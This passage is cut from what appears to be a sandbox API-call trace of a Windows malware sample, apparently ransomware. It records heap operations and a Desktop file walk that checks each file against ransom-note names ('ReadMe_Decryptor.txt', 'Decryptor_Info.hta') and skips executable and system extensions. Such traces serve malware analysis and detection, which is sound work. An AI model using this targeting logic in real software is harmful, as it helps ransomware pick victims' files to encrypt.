lpMem=0x713e38 | out: hHeap=0x6d0000) returned 1 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x213) returned 0x71b728 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713e38 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1b) returned 0x713e10 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713e38 | out: hHeap=0x6d0000) returned 1 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x721d40 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713e10 | out: hHeap=0x6d0000) returned 1 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x23) returned 0x714438 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x433) returned 0x6f2da0 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f2da0 | out: hHeap=0x6d0000) returned 1 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714438 | out: hHeap=0x6d0000) returned 1 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713de8 | out: hHeap=0x6d0000) returned 1 [0077.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6fbb98 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d40 | out: hHeap=0x6d0000) returned 1 [0077.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71b728 | out: hHeap=0x6d0000) returned 1 [0077.765] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x709f08 [0077.765] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x721d40 [0077.765] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6fbcb8 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713dc0 | out: hHeap=0x6d0000) returned 1 [0077.765] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x714b90 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fbcb8 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713e88 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713e60 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b48 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721d40 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709f08 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714350 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721c20 | out: hHeap=0x6d0000) returned 1 [0077.765] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6fbcb8 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fbcb8 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f3a40 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f7918 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fbb98 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f77f8 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f36d0 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d70 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6edb90 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a9c8 | out: hHeap=0x6d0000) returned 1 [0077.765] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x70a9c8 [0077.765] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x113) returned 0x6edb90 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a9c8 | out: hHeap=0x6d0000) returned 1 [0077.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6edb90 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714b90 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703920 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x705a68 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d98 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5ec8 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5720 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714170 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d20 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5750 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x714188 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713cf8 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5760 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9368 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713d48 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7073c0 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e6b00 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6fa980 | out: hHeap=0x6d0000) returned 1 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709810 | out: hHeap=0x6d0000) returned 1 [0077.766] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f68c0 [0077.766] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703e78 | out: hHeap=0x6d0000) returned 1 [0077.766] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6918 [0077.766] lstrcpyW (in: lpString1=0x4af3bc, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0077.766] PathAddBackslashW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="" [0077.766] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0077.766] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", fInfoLevelId=0x0, lpFindFileData=0x28e128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e128) returned 0x70d6c0 [0077.767] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.767] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd010580, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0xd010580, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.768] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.768] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.768] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93148320, ftCreationTime.dwHighDateTime=0x1d5de2c, ftLastAccessTime.dwLowDateTime=0x7c284570, ftLastAccessTime.dwHighDateTime=0x1d5e3fe, ftLastWriteTime.dwLowDateTime=0x7c284570, ftLastWriteTime.dwHighDateTime=0x1d5e3fe, nFileSizeHigh=0x0, nFileSizeLow=0x16831, dwReserved0=0x0, dwReserved1=0x0, cFileName="-of5Uvp7Nk4OWATL4.wav", cAlternateFileName="-OF5UV~1.WAV")) returned 1 [0077.768] lstrcmpW (lpString1="-of5Uvp7Nk4OWATL4.wav", lpString2=".") returned 1 [0077.769] lstrcmpW (lpString1="-of5Uvp7Nk4OWATL4.wav", lpString2="..") returned 1 [0077.769] lstrcmpiW (lpString1="-of5Uvp7Nk4OWATL4.wav", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.769] lstrcmpiW (lpString1="-of5Uvp7Nk4OWATL4.wav", lpString2="Decryptor_Info.hta") returned 1 [0077.769] PathFindExtensionW (pszPath="-of5Uvp7Nk4OWATL4.wav") returned=".wav" [0077.769] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0077.769] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0077.769] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0077.769] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0077.769] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0077.769] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.769] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x721a28 [0077.769] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.769] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6e9368 [0077.770] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x721a28 | out: hHeap=0x6d0000) returned 1 [0077.770] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900a76e0, ftCreationTime.dwHighDateTime=0x1d5e510, ftLastAccessTime.dwLowDateTime=0x94b40d80, ftLastAccessTime.dwHighDateTime=0x1d5e2ba, ftLastWriteTime.dwLowDateTime=0x94b40d80, ftLastWriteTime.dwHighDateTime=0x1d5e2ba, nFileSizeHigh=0x0, nFileSizeLow=0x18a75, dwReserved0=0x0, dwReserved1=0x0, cFileName="5k-TNfiKa_1gmYoWjf1.wav", cAlternateFileName="5K-TNF~1.WAV")) returned 1 [0077.770] lstrcmpW (lpString1="5k-TNfiKa_1gmYoWjf1.wav", lpString2=".") returned 1 [0077.770] lstrcmpW (lpString1="5k-TNfiKa_1gmYoWjf1.wav", lpString2="..") returned 1 [0077.770] lstrcmpiW (lpString1="5k-TNfiKa_1gmYoWjf1.wav", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.770] lstrcmpiW (lpString1="5k-TNfiKa_1gmYoWjf1.wav", lpString2="Decryptor_Info.hta") returned -1 [0077.770] PathFindExtensionW (pszPath="5k-TNfiKa_1gmYoWjf1.wav") returned=".wav" [0077.770] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0077.770] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0077.770] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0077.770] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0077.770] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0077.770] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.770] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6e93f0 [0077.770] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.770] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x721a28 [0077.770] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e93f0 | out: hHeap=0x6d0000) returned 1 [0077.770] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd40760f0, ftCreationTime.dwHighDateTime=0x1d5e070, ftLastAccessTime.dwLowDateTime=0x76f5dcb0, ftLastAccessTime.dwHighDateTime=0x1d5d7e3, ftLastWriteTime.dwLowDateTime=0x76f5dcb0, ftLastWriteTime.dwHighDateTime=0x1d5d7e3, nFileSizeHigh=0x0, nFileSizeLow=0x16eaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="833tdY5_MH34U4.mp3", cAlternateFileName="833TDY~1.MP3")) returned 1 [0077.770] lstrcmpW (lpString1="833tdY5_MH34U4.mp3", lpString2=".") returned 1 [0077.770] lstrcmpW (lpString1="833tdY5_MH34U4.mp3", lpString2="..") returned 1 [0077.770] lstrcmpiW (lpString1="833tdY5_MH34U4.mp3", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.770] lstrcmpiW (lpString1="833tdY5_MH34U4.mp3", lpString2="Decryptor_Info.hta") returned -1 [0077.770] PathFindExtensionW (pszPath="833tdY5_MH34U4.mp3") returned=".mp3" [0077.770] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0077.770] lstrcmpiW (lpString1=".mp3", lpString2=".sys") returned -1 [0077.770] lstrcmpiW (lpString1=".mp3", lpString2=".lnk") returned 1 [0077.770] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0077.770] lstrcmpiW (lpString1=".mp3", lpString2=".msi") returned -1 [0077.770] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.770] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6e93f0 [0077.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6f5ec8 [0077.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e93f0 | out: hHeap=0x6d0000) returned 1 [0077.771] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8116700, ftCreationTime.dwHighDateTime=0x1d62226, ftLastAccessTime.dwLowDateTime=0xf8a9fd80, ftLastAccessTime.dwHighDateTime=0x1d62226, ftLastWriteTime.dwLowDateTime=0x39dae700, ftLastWriteTime.dwHighDateTime=0x1d62200, nFileSizeHigh=0x0, nFileSizeLow=0x93400, dwReserved0=0x0, dwReserved1=0x0, cFileName="cake4.exe", cAlternateFileName="")) returned 1 [0077.771] lstrcmpW (lpString1="cake4.exe", lpString2=".") returned 1 [0077.771] lstrcmpW (lpString1="cake4.exe", lpString2="..") returned 1 [0077.771] lstrcmpiW (lpString1="cake4.exe", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.771] lstrcmpiW (lpString1="cake4.exe", lpString2="Decryptor_Info.hta") returned -1 [0077.771] PathFindExtensionW (pszPath="cake4.exe") returned=".exe" [0077.771] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0077.771] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14df030, ftCreationTime.dwHighDateTime=0x1d5decb, ftLastAccessTime.dwLowDateTime=0x7ed9f200, ftLastAccessTime.dwHighDateTime=0x1d5d9b8, ftLastWriteTime.dwLowDateTime=0x7ed9f200, ftLastWriteTime.dwHighDateTime=0x1d5d9b8, nFileSizeHigh=0x0, nFileSizeLow=0x1711f, dwReserved0=0x0, dwReserved1=0x0, cFileName="CXFgyYpve1g93yz.wav", cAlternateFileName="CXFGYY~1.WAV")) returned 1 [0077.771] lstrcmpW (lpString1="CXFgyYpve1g93yz.wav", lpString2=".") returned 1 [0077.771] lstrcmpW (lpString1="CXFgyYpve1g93yz.wav", lpString2="..") returned 1 [0077.771] lstrcmpiW (lpString1="CXFgyYpve1g93yz.wav", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.771] lstrcmpiW (lpString1="CXFgyYpve1g93yz.wav", lpString2="Decryptor_Info.hta") returned -1 [0077.771] PathFindExtensionW (pszPath="CXFgyYpve1g93yz.wav") returned=".wav" [0077.771] lstrcmpiW (lpString1=".wav", lpString2=".exe") returned 1 [0077.771] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0077.771] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0077.771] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0077.771] lstrcmpiW (lpString1=".wav", lpString2=".msi") returned 1 [0077.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6e93f0 [0077.771] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x6f5f50 [0077.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e93f0 | out: hHeap=0x6d0000) returned 1 [0077.772] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2e002d0, ftCreationTime.dwHighDateTime=0x1d5d9b7, ftLastAccessTime.dwLowDateTime=0x17ab14d0, ftLastAccessTime.dwHighDateTime=0x1d5e06e, ftLastWriteTime.dwLowDateTime=0x17ab14d0, ftLastWriteTime.dwHighDateTime=0x1d5e06e, nFileSizeHigh=0x0, nFileSizeLow=0x3b85, dwReserved0=0x0, dwReserved1=0x0, cFileName="CZ823cDl.mp4", cAlternateFileName="")) returned 1 [0077.772] lstrcmpW (lpString1="CZ823cDl.mp4", lpString2=".") returned 1 [0077.772] lstrcmpW (lpString1="CZ823cDl.mp4", lpString2="..") returned 1 [0077.772] lstrcmpiW (lpString1="CZ823cDl.mp4", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.772] lstrcmpiW (lpString1="CZ823cDl.mp4", lpString2="Decryptor_Info.hta") returned -1 [0077.772] PathFindExtensionW (pszPath="CZ823cDl.mp4") returned=".mp4" [0077.772] lstrcmpiW (lpString1=".mp4", lpString2=".exe") returned 1 [0077.772] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0077.772] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0077.772] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0077.772] lstrcmpiW (lpString1=".mp4", lpString2=".msi") returned -1 [0077.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.772] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x7073c0 [0077.772] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.772] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0077.772] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0077.772] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0077.773] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.773] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0077.773] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0077.773] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0077.773] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0077.773] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0077.773] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0077.773] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0077.773] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b2b2f30, ftCreationTime.dwHighDateTime=0x1d5e4e6, ftLastAccessTime.dwLowDateTime=0x75c121d0, ftLastAccessTime.dwHighDateTime=0x1d5e029, ftLastWriteTime.dwLowDateTime=0x75c121d0, ftLastWriteTime.dwHighDateTime=0x1d5e029, nFileSizeHigh=0x0, nFileSizeLow=0x10466, dwReserved0=0x0, dwReserved1=0x0, cFileName="diUkv-tq-j.swf", cAlternateFileName="DIUKV-~1.SWF")) returned 1 [0077.773] lstrcmpW (lpString1="diUkv-tq-j.swf", lpString2=".") returned 1 [0077.773] lstrcmpW (lpString1="diUkv-tq-j.swf", lpString2="..") returned 1 [0077.773] lstrcmpiW (lpString1="diUkv-tq-j.swf", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.773] lstrcmpiW (lpString1="diUkv-tq-j.swf", lpString2="Decryptor_Info.hta") returned 1 [0077.773] PathFindExtensionW (pszPath="diUkv-tq-j.swf") returned=".swf" [0077.773] lstrcmpiW (lpString1=".swf", lpString2=".exe") returned 1 [0077.773] lstrcmpiW (lpString1=".swf", lpString2=".sys") returned -1 [0077.773] lstrcmpiW (lpString1=".swf", lpString2=".lnk") returned 1 [0077.773] lstrcmpiW (lpString1=".swf", lpString2=".dll") returned 1 [0077.773] lstrcmpiW (lpString1=".swf", lpString2=".msi") returned 1 [0077.773] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.773] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.773] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.773] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x6e93f0 [0077.774] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.774] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x202da330, ftCreationTime.dwHighDateTime=0x1d5da23, ftLastAccessTime.dwLowDateTime=0x25649f10, ftLastAccessTime.dwHighDateTime=0x1d5dbe6, ftLastWriteTime.dwLowDateTime=0x25649f10, ftLastWriteTime.dwHighDateTime=0x1d5dbe6, nFileSizeHigh=0x0, nFileSizeLow=0x1173a, dwReserved0=0x0, dwReserved1=0x0, cFileName="duL9GH_4L.jpg", cAlternateFileName="DUL9GH~1.JPG")) returned 1 [0077.774] lstrcmpW (lpString1="duL9GH_4L.jpg", lpString2=".") returned 1 [0077.774] lstrcmpW (lpString1="duL9GH_4L.jpg", lpString2="..") returned 1 [0077.774] lstrcmpiW (lpString1="duL9GH_4L.jpg", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.774] lstrcmpiW (lpString1="duL9GH_4L.jpg", lpString2="Decryptor_Info.hta") returned 1 [0077.774] PathFindExtensionW (pszPath="duL9GH_4L.jpg") returned=".jpg" [0077.774] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0077.774] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0077.774] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0077.774] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0077.774] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0077.774] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.774] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.774] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.774] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x709810 [0077.774] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.774] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab047510, ftCreationTime.dwHighDateTime=0x1d5d9e2, ftLastAccessTime.dwLowDateTime=0x3ff55200, ftLastAccessTime.dwHighDateTime=0x1d5de8b, ftLastWriteTime.dwLowDateTime=0x3ff55200, ftLastWriteTime.dwHighDateTime=0x1d5de8b, nFileSizeHigh=0x0, nFileSizeLow=0x45ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="duNAoMsaky.xlsx", cAlternateFileName="DUNAOM~1.XLS")) returned 1 [0077.774] lstrcmpW (lpString1="duNAoMsaky.xlsx", lpString2=".") returned 1 [0077.774] lstrcmpW (lpString1="duNAoMsaky.xlsx", lpString2="..") returned 1 [0077.774] lstrcmpiW (lpString1="duNAoMsaky.xlsx", lpString2="ReadMe_Decryptor.txt") returned -1 [0077.774] lstrcmpiW (lpString1="duNAoMsaky.xlsx", lpString2="Decryptor_Info.hta") returned 1 [0077.775] PathFindExtensionW (pszPath="duNAoMsaky.xlsx") returned=".xlsx" [0077.775] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0077.775] lstrcmpiW (lpString1=".xlsx", lpString2=".sys") returned 1 [0077.775] lstrcmpiW (lpString1=".xlsx", lpString2=".lnk") returned 1 [0077.775] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0077.775] lstrcmpiW (lpString1=".xlsx", lpString2=".msi") returned 1 [0077.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x50) returned 0x6f6970 [0077.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x76) returned 0x6e25e8 [0077.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f6970 | out: hHeap=0x6d0000) returned 1 [0077.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x709888 [0077.775] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e25e8 | out: hHeap=0x6d0000) returned 1 [0077.775] FindNextFileW (in: hFindFile=0x70d6c0, lpFindFileData=0x28e128 | out: lpFindFileData=0x28e128*(dwFileAttributes=0x20, 